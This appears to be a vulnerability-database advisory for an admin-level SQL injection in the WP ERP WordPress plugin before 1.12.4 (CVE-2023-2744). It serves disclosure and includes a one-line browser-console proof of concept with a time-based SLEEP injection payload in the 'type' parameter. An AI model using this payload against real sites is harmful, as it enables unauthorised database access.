Lucene search
ArvandyWPVDB-ID:435DA8A1-9955-46D7-A508-B5738259E731HistoryJun 05, 2023 - 12:00 a.m.
WP ERP < 1.12.4 - Admin+ SQL Injection
2023-06-0500:00:00
Arvandy
wpscan.com
11
wp erp
sql injection
rest api
admin
privilege escalation
security vulnerability
0.001 Low
EPSS
Percentile
41.0%
The plugin does not properly sanitise and escape the type parameter in the erp/v1/accounting/v1/people REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
PoC
Sign in as an admin. In WP Admin, run the following code in the browser console, and notice that it takes several seconds to complete, demonstrating the SQL Injection vulnerability. await wp.apiRequest({path: /erp/v1/accounting/v1/people?type=x')+AND+(SELECT+1+FROM+(SELECT+SLEEP(3))x)+AND+('x'%3d'x});
Related
wpexploit
wpexploit
WP ERP < 1.12.4 - Admin+ SQL Injection
2023-06-05 00:00:00
cvelist
cvelist
CVE-2023-2744 WP ERP < 1.12.4 - Admin+ SQL Injection
2023-06-27 13:17:11
nvd
nvd
CVE-2023-2744
2023-06-27 14:15:11
cve
cve
CVE-2023-2744
2023-06-27 14:15:11
githubexploit
githubexploit
Exploit for CVE-2023-2744
2023-12-31 07:27:17
prion
prion
Sql injection
2023-06-27 14:15:00
packetstorm
packetstorm
WordPress WP ERP 1.12.2 SQL Injection
2023-10-16 00:00:00
zdt
zdt
WordPress WP ERP 1.12.2 SQL Injection Vulnerability
2023-10-16 00:00:00